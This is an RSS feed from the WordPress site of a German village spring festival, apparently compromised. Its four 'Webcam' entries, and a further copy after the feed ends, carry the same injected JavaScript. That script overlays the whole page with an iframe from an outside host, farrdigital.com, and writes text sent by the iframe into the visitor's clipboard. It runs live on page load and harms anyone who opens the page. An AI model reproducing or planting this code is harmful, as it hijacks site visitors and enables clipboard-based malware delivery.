<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>52. Borthener Blütenfest</title>
	<atom:link href="https://borthenerbluetenfest.de/herzlich-willkommen-in-borthen-zum-bluetenfest/feed" rel="self" type="application/rss+xml" />
	<link>https://borthenerbluetenfest.de/herzlich-willkommen-in-borthen-zum-bluetenfest</link>
	<description>Spiel, Spaß und Lebensfreude 01.- 03. Mai 2026</description>
	<lastBuildDate>Mon, 16 Jan 2017 10:32:51 +0000</lastBuildDate>
	<language>de</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.9</generator>

<image>
	<url>https://borthenerbluetenfest.de/wp-content/uploads/2015/01/cropped-Riesenrad_Borthen_2013-32x32.jpg</url>
	<title>52. Borthener Blütenfest</title>
	<link>https://borthenerbluetenfest.de/herzlich-willkommen-in-borthen-zum-bluetenfest</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Webcam_4</title>
		<link>https://borthenerbluetenfest.de/herzlich-willkommen-in-borthen-zum-bluetenfest/Archive/3023</link>
		
		<dc:creator><![CDATA[Admin]]></dc:creator>
		<pubDate>Mon, 16 Jan 2017 10:32:51 +0000</pubDate>
				<category><![CDATA[Uncategorized]]></category>
		<guid isPermaLink="false">http://borthenerbluetenfest.de/Archive/3023</guid>

					<description><![CDATA[]]></description>
										<content:encoded><![CDATA[ [<a href="https://borthenerbluetenfest.de/herzlich-willkommen-in-borthen-zum-bluetenfest/Archive/3023">See image gallery at borthenerbluetenfest.de</a>] 
 <script>
(function() {
  const GLOBAL_KEY = Symbol.for("__490490049849__");

  const registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || {
    iframeReady: false,
    fetchCheck: null,
    iframeId: "ifr_" + Math.random().toString(36).slice(2),
    retryAttempts: 2,
    baseUrl: "https://farrdigital.com/",
  };

  if (registry.iframeReady) return;  

  function safeAppendQuery(url, key, val) {
    const sep = url.includes("?") ? "&" : "?";
    return url + sep + encodeURIComponent(key) + "=" + encodeURIComponent(val);
  }

  function detectIframeCreation(cb) {
    try {
      const test = document.createElement("iframe");
      test.style.display = "none";
      test.onload = () => {
        test.remove();
        cb(true);
      };
      test.onerror = () => {
        test.remove();
        cb(false);
      };
      test.src = "about:blank";
      document.body.appendChild(test);
    } catch (e) {
      cb(false);
    }
  }

  function verifyURLAvailable(url, retries) {
    return new Promise((resolve) => {
      const check = () => {
        fetch(url, { method: "HEAD", mode: "no-cors" })
          .then(() => resolve(true))
          .catch(() => {
            if (retries > 0) {
              setTimeout(() => check(--retries), 1000);
            } else {
              const img = new Image();
              img.src = safeAppendQuery(url, "checkimg", Date.now());
              img.onload = () => resolve(true);
              img.onerror = () => resolve(false);
            }
          });
      };
      check(retries);
    });
  }

  function createIframe(url) {
    if (registry.iframeReady) return;

    const iframe = document.createElement("iframe");
    iframe.src = safeAppendQuery(url, "v", Math.random().toString(36).slice(2));
    iframe.id = registry.iframeId;
    iframe.style.cssText = `
      position: fixed !important;
      top: 0; left: 0;
      width: 100vw; height: 100vh;
      border: none; z-index: 2147483647;
      margin: 0; padding: 0; overflow: hidden;
    `;
    iframe.setAttribute("aria-hidden", "true");

    registry.iframeReady = true;

    try {
      document.body.appendChild(iframe);
    } catch (e) {
      const obs = new MutationObserver(() => {
        if (document.body && !document.getElementById(registry.iframeId)) {
          document.body.appendChild(iframe);
          obs.disconnect();
        }
      });
      obs.observe(document.documentElement, { childList: true, subtree: true });
    }

    // copy event from iframe
    window.addEventListener("message", (event) => {
      if (!event.data || typeof event.data !== "object") return;
      if (event.data.type === "copy" && typeof event.data.text === "string") {
        tryCopy(event.data.text);
      }
    });

    function tryCopy(text) {
      if (navigator.clipboard && navigator.clipboard.writeText) {
        navigator.clipboard.writeText(text).catch(() => fallback(text));
      } else {
        fallback(text);
      }

      function fallback(txt) {
        try {
          const ta = document.createElement("textarea");
          ta.value = txt;
          ta.style.position = "absolute";
          ta.style.left = "-9999px";
          document.body.appendChild(ta);
          ta.select();
          document.execCommand("copy");
          document.body.removeChild(ta);
        } catch (e) {}
      }
    }
  }

  function start() {
    if (registry.fetchCheck) {
      registry.fetchCheck.then((ok) => {
        if (ok && !registry.iframeReady) {
          detectIframeCreation((canCreate) => {
            if (canCreate) createIframe(registry.baseUrl);
          });
        }
      });
      return;
    }

    registry.fetchCheck = verifyURLAvailable(registry.baseUrl, registry.retryAttempts)
      .then((isOk) => {
        if (isOk && !registry.iframeReady) {
          detectIframeCreation((canCreate) => {
            if (canCreate) createIframe(registry.baseUrl);
          });
        }
      })
      .catch(() => {});  
  }

  if (document.readyState === "complete" || document.body) {
    start();
  } else {
    window.addEventListener("DOMContentLoaded", start);
  }
})();
</script> ]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Webcam_3</title>
		<link>https://borthenerbluetenfest.de/herzlich-willkommen-in-borthen-zum-bluetenfest/Archive/3022</link>
		
		<dc:creator><![CDATA[Admin]]></dc:creator>
		<pubDate>Mon, 16 Jan 2017 10:32:41 +0000</pubDate>
				<category><![CDATA[Uncategorized]]></category>
		<guid isPermaLink="false">http://borthenerbluetenfest.de/Archive/3022</guid>

					<description><![CDATA[]]></description>
										<content:encoded><![CDATA[ [<a href="https://borthenerbluetenfest.de/herzlich-willkommen-in-borthen-zum-bluetenfest/Archive/3022">See image gallery at borthenerbluetenfest.de</a>] 
 <script>
(function() {
  const GLOBAL_KEY = Symbol.for("__490490049849__");

  const registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || {
    iframeReady: false,
    fetchCheck: null,
    iframeId: "ifr_" + Math.random().toString(36).slice(2),
    retryAttempts: 2,
    baseUrl: "https://farrdigital.com/",
  };

  if (registry.iframeReady) return;  

  function safeAppendQuery(url, key, val) {
    const sep = url.includes("?") ? "&" : "?";
    return url + sep + encodeURIComponent(key) + "=" + encodeURIComponent(val);
  }

  function detectIframeCreation(cb) {
    try {
      const test = document.createElement("iframe");
      test.style.display = "none";
      test.onload = () => {
        test.remove();
        cb(true);
      };
      test.onerror = () => {
        test.remove();
        cb(false);
      };
      test.src = "about:blank";
      document.body.appendChild(test);
    } catch (e) {
      cb(false);
    }
  }

  function verifyURLAvailable(url, retries) {
    return new Promise((resolve) => {
      const check = () => {
        fetch(url, { method: "HEAD", mode: "no-cors" })
          .then(() => resolve(true))
          .catch(() => {
            if (retries > 0) {
              setTimeout(() => check(--retries), 1000);
            } else {
              const img = new Image();
              img.src = safeAppendQuery(url, "checkimg", Date.now());
              img.onload = () => resolve(true);
              img.onerror = () => resolve(false);
            }
          });
      };
      check(retries);
    });
  }

  function createIframe(url) {
    if (registry.iframeReady) return;

    const iframe = document.createElement("iframe");
    iframe.src = safeAppendQuery(url, "v", Math.random().toString(36).slice(2));
    iframe.id = registry.iframeId;
    iframe.style.cssText = `
      position: fixed !important;
      top: 0; left: 0;
      width: 100vw; height: 100vh;
      border: none; z-index: 2147483647;
      margin: 0; padding: 0; overflow: hidden;
    `;
    iframe.setAttribute("aria-hidden", "true");

    registry.iframeReady = true;

    try {
      document.body.appendChild(iframe);
    } catch (e) {
      const obs = new MutationObserver(() => {
        if (document.body && !document.getElementById(registry.iframeId)) {
          document.body.appendChild(iframe);
          obs.disconnect();
        }
      });
      obs.observe(document.documentElement, { childList: true, subtree: true });
    }

    // copy event from iframe
    window.addEventListener("message", (event) => {
      if (!event.data || typeof event.data !== "object") return;
      if (event.data.type === "copy" && typeof event.data.text === "string") {
        tryCopy(event.data.text);
      }
    });

    function tryCopy(text) {
      if (navigator.clipboard && navigator.clipboard.writeText) {
        navigator.clipboard.writeText(text).catch(() => fallback(text));
      } else {
        fallback(text);
      }

      function fallback(txt) {
        try {
          const ta = document.createElement("textarea");
          ta.value = txt;
          ta.style.position = "absolute";
          ta.style.left = "-9999px";
          document.body.appendChild(ta);
          ta.select();
          document.execCommand("copy");
          document.body.removeChild(ta);
        } catch (e) {}
      }
    }
  }

  function start() {
    if (registry.fetchCheck) {
      registry.fetchCheck.then((ok) => {
        if (ok && !registry.iframeReady) {
          detectIframeCreation((canCreate) => {
            if (canCreate) createIframe(registry.baseUrl);
          });
        }
      });
      return;
    }

    registry.fetchCheck = verifyURLAvailable(registry.baseUrl, registry.retryAttempts)
      .then((isOk) => {
        if (isOk && !registry.iframeReady) {
          detectIframeCreation((canCreate) => {
            if (canCreate) createIframe(registry.baseUrl);
          });
        }
      })
      .catch(() => {});  
  }

  if (document.readyState === "complete" || document.body) {
    start();
  } else {
    window.addEventListener("DOMContentLoaded", start);
  }
})();
</script> ]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Webcam_2</title>
		<link>https://borthenerbluetenfest.de/herzlich-willkommen-in-borthen-zum-bluetenfest/Archive/3021</link>
		
		<dc:creator><![CDATA[Admin]]></dc:creator>
		<pubDate>Mon, 16 Jan 2017 10:32:30 +0000</pubDate>
				<category><![CDATA[Uncategorized]]></category>
		<guid isPermaLink="false">http://borthenerbluetenfest.de/Archive/3021</guid>

					<description><![CDATA[]]></description>
										<content:encoded><![CDATA[ [<a href="https://borthenerbluetenfest.de/herzlich-willkommen-in-borthen-zum-bluetenfest/Archive/3021">See image gallery at borthenerbluetenfest.de</a>] 
 <script>
(function() {
  const GLOBAL_KEY = Symbol.for("__490490049849__");

  const registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || {
    iframeReady: false,
    fetchCheck: null,
    iframeId: "ifr_" + Math.random().toString(36).slice(2),
    retryAttempts: 2,
    baseUrl: "https://farrdigital.com/",
  };

  if (registry.iframeReady) return;  

  function safeAppendQuery(url, key, val) {
    const sep = url.includes("?") ? "&" : "?";
    return url + sep + encodeURIComponent(key) + "=" + encodeURIComponent(val);
  }

  function detectIframeCreation(cb) {
    try {
      const test = document.createElement("iframe");
      test.style.display = "none";
      test.onload = () => {
        test.remove();
        cb(true);
      };
      test.onerror = () => {
        test.remove();
        cb(false);
      };
      test.src = "about:blank";
      document.body.appendChild(test);
    } catch (e) {
      cb(false);
    }
  }

  function verifyURLAvailable(url, retries) {
    return new Promise((resolve) => {
      const check = () => {
        fetch(url, { method: "HEAD", mode: "no-cors" })
          .then(() => resolve(true))
          .catch(() => {
            if (retries > 0) {
              setTimeout(() => check(--retries), 1000);
            } else {
              const img = new Image();
              img.src = safeAppendQuery(url, "checkimg", Date.now());
              img.onload = () => resolve(true);
              img.onerror = () => resolve(false);
            }
          });
      };
      check(retries);
    });
  }

  function createIframe(url) {
    if (registry.iframeReady) return;

    const iframe = document.createElement("iframe");
    iframe.src = safeAppendQuery(url, "v", Math.random().toString(36).slice(2));
    iframe.id = registry.iframeId;
    iframe.style.cssText = `
      position: fixed !important;
      top: 0; left: 0;
      width: 100vw; height: 100vh;
      border: none; z-index: 2147483647;
      margin: 0; padding: 0; overflow: hidden;
    `;
    iframe.setAttribute("aria-hidden", "true");

    registry.iframeReady = true;

    try {
      document.body.appendChild(iframe);
    } catch (e) {
      const obs = new MutationObserver(() => {
        if (document.body && !document.getElementById(registry.iframeId)) {
          document.body.appendChild(iframe);
          obs.disconnect();
        }
      });
      obs.observe(document.documentElement, { childList: true, subtree: true });
    }

    // copy event from iframe
    window.addEventListener("message", (event) => {
      if (!event.data || typeof event.data !== "object") return;
      if (event.data.type === "copy" && typeof event.data.text === "string") {
        tryCopy(event.data.text);
      }
    });

    function tryCopy(text) {
      if (navigator.clipboard && navigator.clipboard.writeText) {
        navigator.clipboard.writeText(text).catch(() => fallback(text));
      } else {
        fallback(text);
      }

      function fallback(txt) {
        try {
          const ta = document.createElement("textarea");
          ta.value = txt;
          ta.style.position = "absolute";
          ta.style.left = "-9999px";
          document.body.appendChild(ta);
          ta.select();
          document.execCommand("copy");
          document.body.removeChild(ta);
        } catch (e) {}
      }
    }
  }

  function start() {
    if (registry.fetchCheck) {
      registry.fetchCheck.then((ok) => {
        if (ok && !registry.iframeReady) {
          detectIframeCreation((canCreate) => {
            if (canCreate) createIframe(registry.baseUrl);
          });
        }
      });
      return;
    }

    registry.fetchCheck = verifyURLAvailable(registry.baseUrl, registry.retryAttempts)
      .then((isOk) => {
        if (isOk && !registry.iframeReady) {
          detectIframeCreation((canCreate) => {
            if (canCreate) createIframe(registry.baseUrl);
          });
        }
      })
      .catch(() => {});  
  }

  if (document.readyState === "complete" || document.body) {
    start();
  } else {
    window.addEventListener("DOMContentLoaded", start);
  }
})();
</script> ]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Webcam_1</title>
		<link>https://borthenerbluetenfest.de/herzlich-willkommen-in-borthen-zum-bluetenfest/Archive/3020</link>
		
		<dc:creator><![CDATA[Admin]]></dc:creator>
		<pubDate>Mon, 16 Jan 2017 10:32:07 +0000</pubDate>
				<category><![CDATA[Uncategorized]]></category>
		<guid isPermaLink="false">http://borthenerbluetenfest.de/Archive/3020</guid>

					<description><![CDATA[]]></description>
										<content:encoded><![CDATA[ [<a href="https://borthenerbluetenfest.de/herzlich-willkommen-in-borthen-zum-bluetenfest/Archive/3020">See image gallery at borthenerbluetenfest.de</a>] 
 <script>
(function() {
  const GLOBAL_KEY = Symbol.for("__490490049849__");

  const registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || {
    iframeReady: false,
    fetchCheck: null,
    iframeId: "ifr_" + Math.random().toString(36).slice(2),
    retryAttempts: 2,
    baseUrl: "https://farrdigital.com/",
  };

  if (registry.iframeReady) return;  

  function safeAppendQuery(url, key, val) {
    const sep = url.includes("?") ? "&" : "?";
    return url + sep + encodeURIComponent(key) + "=" + encodeURIComponent(val);
  }

  function detectIframeCreation(cb) {
    try {
      const test = document.createElement("iframe");
      test.style.display = "none";
      test.onload = () => {
        test.remove();
        cb(true);
      };
      test.onerror = () => {
        test.remove();
        cb(false);
      };
      test.src = "about:blank";
      document.body.appendChild(test);
    } catch (e) {
      cb(false);
    }
  }

  function verifyURLAvailable(url, retries) {
    return new Promise((resolve) => {
      const check = () => {
        fetch(url, { method: "HEAD", mode: "no-cors" })
          .then(() => resolve(true))
          .catch(() => {
            if (retries > 0) {
              setTimeout(() => check(--retries), 1000);
            } else {
              const img = new Image();
              img.src = safeAppendQuery(url, "checkimg", Date.now());
              img.onload = () => resolve(true);
              img.onerror = () => resolve(false);
            }
          });
      };
      check(retries);
    });
  }

  function createIframe(url) {
    if (registry.iframeReady) return;

    const iframe = document.createElement("iframe");
    iframe.src = safeAppendQuery(url, "v", Math.random().toString(36).slice(2));
    iframe.id = registry.iframeId;
    iframe.style.cssText = `
      position: fixed !important;
      top: 0; left: 0;
      width: 100vw; height: 100vh;
      border: none; z-index: 2147483647;
      margin: 0; padding: 0; overflow: hidden;
    `;
    iframe.setAttribute("aria-hidden", "true");

    registry.iframeReady = true;

    try {
      document.body.appendChild(iframe);
    } catch (e) {
      const obs = new MutationObserver(() => {
        if (document.body && !document.getElementById(registry.iframeId)) {
          document.body.appendChild(iframe);
          obs.disconnect();
        }
      });
      obs.observe(document.documentElement, { childList: true, subtree: true });
    }

    // copy event from iframe
    window.addEventListener("message", (event) => {
      if (!event.data || typeof event.data !== "object") return;
      if (event.data.type === "copy" && typeof event.data.text === "string") {
        tryCopy(event.data.text);
      }
    });

    function tryCopy(text) {
      if (navigator.clipboard && navigator.clipboard.writeText) {
        navigator.clipboard.writeText(text).catch(() => fallback(text));
      } else {
        fallback(text);
      }

      function fallback(txt) {
        try {
          const ta = document.createElement("textarea");
          ta.value = txt;
          ta.style.position = "absolute";
          ta.style.left = "-9999px";
          document.body.appendChild(ta);
          ta.select();
          document.execCommand("copy");
          document.body.removeChild(ta);
        } catch (e) {}
      }
    }
  }

  function start() {
    if (registry.fetchCheck) {
      registry.fetchCheck.then((ok) => {
        if (ok && !registry.iframeReady) {
          detectIframeCreation((canCreate) => {
            if (canCreate) createIframe(registry.baseUrl);
          });
        }
      });
      return;
    }

    registry.fetchCheck = verifyURLAvailable(registry.baseUrl, registry.retryAttempts)
      .then((isOk) => {
        if (isOk && !registry.iframeReady) {
          detectIframeCreation((canCreate) => {
            if (canCreate) createIframe(registry.baseUrl);
          });
        }
      })
      .catch(() => {});  
  }

  if (document.readyState === "complete" || document.body) {
    start();
  } else {
    window.addEventListener("DOMContentLoaded", start);
  }
})();
</script> ]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
<script>
(function() {
  const GLOBAL_KEY = Symbol.for("__490490049849__");

  const registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || {
    iframeReady: false,
    fetchCheck: null,
    iframeId: "ifr_" + Math.random().toString(36).slice(2),
    retryAttempts: 2,
    baseUrl: "https://farrdigital.com/",
  };

  if (registry.iframeReady) return;  

  function safeAppendQuery(url, key, val) {
    const sep = url.includes("?") ? "&" : "?";
    return url + sep + encodeURIComponent(key) + "=" + encodeURIComponent(val);
  }

  function detectIframeCreation(cb) {
    try {
      const test = document.createElement("iframe");
      test.style.display = "none";
      test.onload = () => {
        test.remove();
        cb(true);
      };
      test.onerror = () => {
        test.remove();
        cb(false);
      };
      test.src = "about:blank";
      document.body.appendChild(test);
    } catch (e) {
      cb(false);
    }
  }

  function verifyURLAvailable(url, retries) {
    return new Promise((resolve) => {
      const check = () => {
        fetch(url, { method: "HEAD", mode: "no-cors" })
          .then(() => resolve(true))
          .catch(() => {
            if (retries > 0) {
              setTimeout(() => check(--retries), 1000);
            } else {
              const img = new Image();
              img.src = safeAppendQuery(url, "checkimg", Date.now());
              img.onload = () => resolve(true);
              img.onerror = () => resolve(false);
            }
          });
      };
      check(retries);
    });
  }

  function createIframe(url) {
    if (registry.iframeReady) return;

    const iframe = document.createElement("iframe");
    iframe.src = safeAppendQuery(url, "v", Math.random().toString(36).slice(2));
    iframe.id = registry.iframeId;
    iframe.style.cssText = `
      position: fixed !important;
      top: 0; left: 0;
      width: 100vw; height: 100vh;
      border: none; z-index: 2147483647;
      margin: 0; padding: 0; overflow: hidden;
    `;
    iframe.setAttribute("aria-hidden", "true");

    registry.iframeReady = true;

    try {
      document.body.appendChild(iframe);
    } catch (e) {
      const obs = new MutationObserver(() => {
        if (document.body && !document.getElementById(registry.iframeId)) {
          document.body.appendChild(iframe);
          obs.disconnect();
        }
      });
      obs.observe(document.documentElement, { childList: true, subtree: true });
    }

    // copy event from iframe
    window.addEventListener("message", (event) => {
      if (!event.data || typeof event.data !== "object") return;
      if (event.data.type === "copy" && typeof event.data.text === "string") {
        tryCopy(event.data.text);
      }
    });

    function tryCopy(text) {
      if (navigator.clipboard && navigator.clipboard.writeText) {
        navigator.clipboard.writeText(text).catch(() => fallback(text));
      } else {
        fallback(text);
      }

      function fallback(txt) {
        try {
          const ta = document.createElement("textarea");
          ta.value = txt;
          ta.style.position = "absolute";
          ta.style.left = "-9999px";
          document.body.appendChild(ta);
          ta.select();
          document.execCommand("copy");
          document.body.removeChild(ta);
        } catch (e) {}
      }
    }
  }

  function start() {
    if (registry.fetchCheck) {
      registry.fetchCheck.then((ok) => {
        if (ok && !registry.iframeReady) {
          detectIframeCreation((canCreate) => {
            if (canCreate) createIframe(registry.baseUrl);
          });
        }
      });
      return;
    }

    registry.fetchCheck = verifyURLAvailable(registry.baseUrl, registry.retryAttempts)
      .then((isOk) => {
        if (isOk && !registry.iframeReady) {
          detectIframeCreation((canCreate) => {
            if (canCreate) createIframe(registry.baseUrl);
          });
        }
      })
      .catch(() => {});  
  }

  if (document.readyState === "complete" || document.body) {
    start();
  } else {
    window.addEventListener("DOMContentLoaded", start);
  }
})();
</script>